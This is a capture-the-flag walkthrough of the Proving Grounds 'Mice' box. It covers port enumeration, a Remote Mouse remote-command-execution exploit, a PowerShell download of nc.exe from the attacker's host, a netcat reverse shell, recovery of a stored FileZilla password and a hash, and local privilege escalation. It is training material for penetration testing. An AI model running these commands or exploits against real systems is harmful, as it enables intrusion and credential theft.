June 23, 2026
Mice | Proving Grounds | OSCP Preparation
Box: Mice Community Rating: Hard

By SilentExploit
7 min read
I start off by running nmap and rustscan to enumerate open ports:
┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 23:06 +0100
Initiating Parallel DNS resolution of 1 host. at 23:06
Completed Parallel DNS resolution of 1 host. at 23:06, 0.50s elapsed
Initiating SYN Stealth Scan at 23:06
Scanning 192.168.165.199 [65535 ports]
Discovered open port 3389/tcp on 192.168.165.199
Discovered open port 1980/tcp on 192.168.165.199
SYN Stealth Scan Timing: About 42.66% done; ETC: 23:08 (0:00:42 remaining)
Discovered open port 1979/tcp on 192.168.165.199
Discovered open port 1979/tcp on 192.168.165.199
Discovered open port 1978/tcp on 192.168.165.199
Discovered open port 7680/tcp on 192.168.165.199
Completed SYN Stealth Scan at 23:08, 87.29s elapsed (65535 total ports)
Nmap scan report for 192.168.165.199
Host is up (0.031s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
1978/tcp open unisql
1979/tcp open unisql-java
1980/tcp open pearldoc-xact
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 87.88 seconds
Raw packets sent: 196661 (8.653MB) | Rcvd: 84 (3.717KB)
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 23:08 +0100
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 23:08
Completed Parallel DNS resolution of 1 host. at 23:08, 0.50s elapsed
Initiating SYN Stealth Scan at 23:08
Scanning 192.168.165.199 [1000 ports]
Discovered open port 3389/tcp on 192.168.165.199
Completed SYN Stealth Scan at 23:08, 4.64s elapsed (1000 total ports)
Initiating Service scan at 23:08
Scanning 1 service on 192.168.165.199
Completed Service scan at 23:08, 6.22s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.165.199.
Initiating NSE at 23:08
Completed NSE at 23:08, 5.04s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.13s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Nmap scan report for 192.168.165.199
Host is up (0.025s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-06-23T22:08:43+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Issuer: commonName=Remote-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-22T22:06:05
| Not valid after: 2026-12-22T22:06:05
| MD5: f203 2fd3 4d93 a633 dbb5 2ebe 14ed c029
| SHA-1: 3088 8831 6a77 1f85 efb1 9c69 56d4 dbf8 d21a deae
|_SHA-256: 4abf c2af a191 7ed5 cb4b 6243 e787 51b5 25b9 7d31 813c 1dab 2678 d048 4344 bff1
| rdp-ntlm-info:
| Target_Name: REMOTE-PC
| NetBIOS_Domain_Name: REMOTE-PC
| NetBIOS_Computer_Name: REMOTE-PC
| DNS_Domain_Name: Remote-PC
| DNS_Computer_Name: Remote-PC
| Product_Version: 10.0.19041
|_ System_Time: 2026-06-23T22:08:38+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<SNIP>
┌──(root㉿user)-[/home/user/CVE-2026-5027]
└─# rustscan -a $target
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.165.199:1979
Open 192.168.165.199:1978
Open 192.168.165.199:1980
Open 192.168.165.199:3389
Open 192.168.165.199:7680
[~] Starting Script(s)
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 23:10 +0100
Initiating Ping Scan at 23:10
Scanning 192.168.165.199 [4 ports]
Completed Ping Scan at 23:10, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:10
Completed Parallel DNS resolution of 1 host. at 23:10, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:10
Scanning 192.168.165.199 [5 ports]
Discovered open port 3389/tcp on 192.168.165.199
Discovered open port 1979/tcp on 192.168.165.199
Discovered open port 1978/tcp on 192.168.165.199
Discovered open port 1980/tcp on 192.168.165.199
Completed SYN Stealth Scan at 23:10, 1.22s elapsed (5 total ports)
Nmap scan report for 192.168.165.199
Host is up, received echo-reply ttl 125 (0.043s latency).
Scanned at 2026-06-23 23:10:29 BST for 1s
PORT STATE SERVICE REASON
1978/tcp open unisql syn-ack ttl 125
1979/tcp open unisql-java syn-ack ttl 125
1980/tcp open pearldoc-xact syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
7680/tcp filtered pando-pub no-response
These are some interesting results. None of the traditional points of entry (web servers, SMB, etc.) are available. We have RDP, but without credentials it doesn't make much sense to try brute-forcing our way in.
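The two scanners above do not fully agree: nmap's full sweep reports 7680/tcp as open, while the nmap table rustscan ran afterwards reports it as filtered. The script below is an added example (not part of the original post, nmap or rustscan): it parses trimmed copies of the scanner output shown above into port tables and reports where the states disagree, so that a flapping port gets rescanned rather than dropped from the attack surface or the hardening list. The parsing and comparison code is my own.

```python
"""Compare port states across the nmap and rustscan output shown above.

Added example for this write-up, not part of the original post, nmap or
rustscan. The two text blocks are trimmed copies of the scanner output
above; the parsing and comparison helpers are my own.
"""
import re

# Trimmed from the nmap -p- sweep shown above.
NMAP_FULL_SWEEP = """\
PORT STATE SERVICE
1978/tcp open unisql
1979/tcp open unisql-java
1980/tcp open pearldoc-xact
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
Read data files from: /usr/share/nmap
"""

# Trimmed from the rustscan run shown above: its own "Open ip:port" lines,
# followed by the nmap table rustscan produces for the ports it found.
RUSTSCAN_RUN = """\
Open 192.168.165.199:1979
Open 192.168.165.199:1978
Open 192.168.165.199:1980
Open 192.168.165.199:3389
Open 192.168.165.199:7680
[~] Starting Script(s)
PORT STATE SERVICE REASON
1978/tcp open unisql syn-ack ttl 125
1979/tcp open unisql-java syn-ack ttl 125
1980/tcp open pearldoc-xact syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
7680/tcp filtered pando-pub no-response
"""

# "1978/tcp open unisql ..." -> port, protocol, state, service
NMAP_PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)
# rustscan's own discovery lines: "Open 192.168.165.199:1979"
RUSTSCAN_OPEN_LINE = re.compile(r"^Open\s+(\S+):(\d+)\s*$", re.MULTILINE)


def parse_nmap_table(text):
    """Map port number -> (state, service) for every PORT/STATE/SERVICE row."""
    return {int(port): (state, service)
            for port, _proto, state, service in NMAP_PORT_LINE.findall(text)}


def parse_rustscan_open(text):
    """Set of ports rustscan itself reported as open."""
    return {int(port) for _ip, port in RUSTSCAN_OPEN_LINE.findall(text)}


def compare_states(table_a, table_b):
    """Ports present in both tables whose state differs, as {port: (state_a, state_b)}."""
    return {port: (table_a[port][0], table_b[port][0])
            for port in sorted(table_a.keys() & table_b.keys())
            if table_a[port][0] != table_b[port][0]}


def scan_summary(nmap_text, rustscan_text):
    """Open ports per scanner plus the ports whose state the two nmap tables disagree on."""
    nmap_table = parse_nmap_table(nmap_text)
    rustscan_table = parse_nmap_table(rustscan_text)
    return {
        "open_in_sweep": sorted(p for p, (state, _) in nmap_table.items() if state == "open"),
        "open_per_rustscan": sorted(parse_rustscan_open(rustscan_text)),
        "disagreements": compare_states(nmap_table, rustscan_table),
    }


if __name__ == "__main__":
    for key, value in scan_summary(NMAP_FULL_SWEEP, RUSTSCAN_RUN).items():
        print(f"{key}: {value}")
```

Running it lists 7680 under `disagreements` as `("open", "filtered")`. A port that flips between open and filtered across back-to-back scans usually means an intermittent listener or rate-limited filtering, so it deserves a targeted rescan (`-p 7680` with service detection) before it is written off on either side of the engagement.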
I then used nmap's service detection against individual ports to pinpoint the exact services running on the target. Port 1978 confirmed that we have Remote Mouse.
┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# nmap -sVC $target -p 1978
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 23:11 +0100
Nmap scan report for 192.168.165.199
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
1978/tcp open remotemouse Emote Remote Mouse
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.07 seconds
This is a companion app that turns your smartphone or tablet into a wireless mouse, keyboard, and trackpad for your Windows PC.
I was unable to find the exact version running on the target from my port-based enumeration, but luckily the searchsploit results are narrow.
┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# searchsploit 'Remote Mouse'
-------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------- ---------------------------------
<SNIP>
Remote Mouse 4.002 - Unquoted Service Path | windows/local/50258.txt
Remote Mouse GUI 3.008 - Local Privilege Escalation | windows/local/50047.txt
RemoteMouse 3.008 - Arbitrary Remote Command Execution | windows/remote/46697.py
The only exploit applicable to us right now is RemoteMouse 3.008 - Arbitrary Remote Command Execution. We don't have local access, so we can't escalate privileges or make use of an unquoted service path, and the other two results can be discounted.
I initially tested whether we had command execution via ping: this exploit gives no visible output on our machine, so if we see the ping arrive in tcpdump, we know that we have code execution on the target.
┌──(root㉿user)-[/run/…/2024/HTBox/mic/Wifi-Mouse-1.7.8.5]
└─# python2 exploit2.py 192.168.228.199 192.168.45.205 'cmd /c ping 192.168.45.205'
[+] 3..2..1..
[+] *Super fast hacker typing*
┌──(root㉿user)-[/home/user]
└─# tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:42:50.572094 IP 192.168.45.205.33312 > 192.168.228.199.1978: Flags [S], seq 2902119491, win 64240, options [mss 1460,sackOK,TS val 230446086 ecr 0,nop,wscale 10], length 0
14:42:50.594102 IP 192.168.228.199.1978 > 192.168.45.205.33312: Flags [S.], seq 2645223207, ack 2902119492, win 65535, options [mss 1400,nop,wscale 8,nop,nop,sackOK], length 0
Whenever you are in this position on a Windows box, you have the following options:
a) download an msfvenom executable onto the target and execute it
b) use PowerShell's IEX (Invoke-Expression) (not available here)
c) transfer a copy of the netcat binary (shipped with Kali by default) onto the target and use it to send a shell back to the listener
┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# python3 exploit4.py --target-ip $target --cmd "powershell wget http://192.168.45.208/nc.exe -OutFile C:\Windows\Temp\nc.exe"
┌──(root㉿user)-[/usr/share/windows-resources/binaries]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.242.199 - - [01/May/2026 01:23:28] "GET /nc.exe HTTP/1.1" 200 -
┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# python3 exploit4.py --target-ip $target --cmd 'powershell -c "C:/Windows/Temp/nc.exe 192.168.45.208 80 -e cmd"'
┌──(root㉿user)-[/usr/share/windows-resources/binaries]
└─# rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.208] from (UNKNOWN) [192.168.242.199] 49907
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32\WindowsPowerShell\v1.0>
Privilege Escalation
At this point you have a shell as the user divine, but you don't have the plaintext password needed to start an RDP session. There were some nuggets scattered around: the NetNTLMv2 hash for divine was recoverable on the machine and visible in the linpeas output, BUT it doesn't crack with any wordlist.
Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: divine::REMOTE-PC:1122334455667788:c37a12371f97c504147121e6d9a0cef3:01010000000000002711963cdde3dc018c39fd6e4260b4fb0000000008003000300000000000000000000000002000008efd1efe97fc0387bbb7cbb93e1c64202dec43df88870764b7699ef801869f470a00100000000000000000000000000000000000090000000000000000000000
Perusing Program Files we can see that we have FileZilla installed on the target.
PS C:\Program Files\FileZilla FTP Client> dir "C:\Users\divine\AppData\Roaming\FileZilla\"
dir "C:\Users\divine\AppData\Roaming\FileZilla\"
Directory: C:\Users\divine\AppData\Roaming\FileZilla
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/6/2021 8:40 PM 18963 filezilla.xml
-a---- 12/6/2021 8:40 PM 451 layout.xml
-a---- 12/6/2021 8:40 PM 28672 queue.sqlite3
-a---- 12/6/2021 8:40 PM 458 recentservers.xml
PS C:\Program Files\FileZilla FTP Client> type "C:\Users\divine\AppData\Roaming\FileZilla\recentservers.xml"
type "C:\Users\divine\AppData\Roaming\FileZilla\recentservers.xml"
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
<RecentServers>
<Server>
<Host>ftp.pg</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>divine</User>
<Pass encoding="base64">Q29udHJvbEZyZWFrMTE=</Pass>
<Logontype>1</Logontype>
<PasvMode>MODE_DEFAULT</PasvMode>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3>
┌──(root㉿user)-[/home/user]
└─# echo "Q29udHJvbEZyZWFrMTE=" | base64 -d
ControlFreak11
As you can see, once the base64 string is decoded, the password for divine is ControlFreak11.
┌──(root㉿user)-[/home/user]
└─# xfreerdp3 /v:192.168.227.199 /u:divine /p:'ControlFreak11' /cert:ignore /dynamic-resolution /drive:tools,/run/media/user/2024/HTBox/tools
Now, in the RDP session, look at what applications are sitting on the desktop. On a number of boxes (and exams) I have done now, the vector for local privilege escalation has been sitting right there on the desktop of the target.
If you remember our searchsploit results earlier, we had a local privilege escalation exploit for Remote Mouse 3.008.
You can confirm the version number by checking the properties of the application in Program Files.
Now that we have confirmed the local privilege escalation exploit applies to our exact version, we can follow the instructions in the exploit write-up (windows/local/50047.txt from the searchsploit results).
I won't go through every step but I will highlight the pertinent points as the guidance is very brief.
You will need to open Remote Mouse via the system tray (you're not an administrator, so you can't run the application directly).
In order to spawn the shell just click the Refresh button (sometimes called the Update or Reload button).
A new instance of command prompt will pop up as administrator: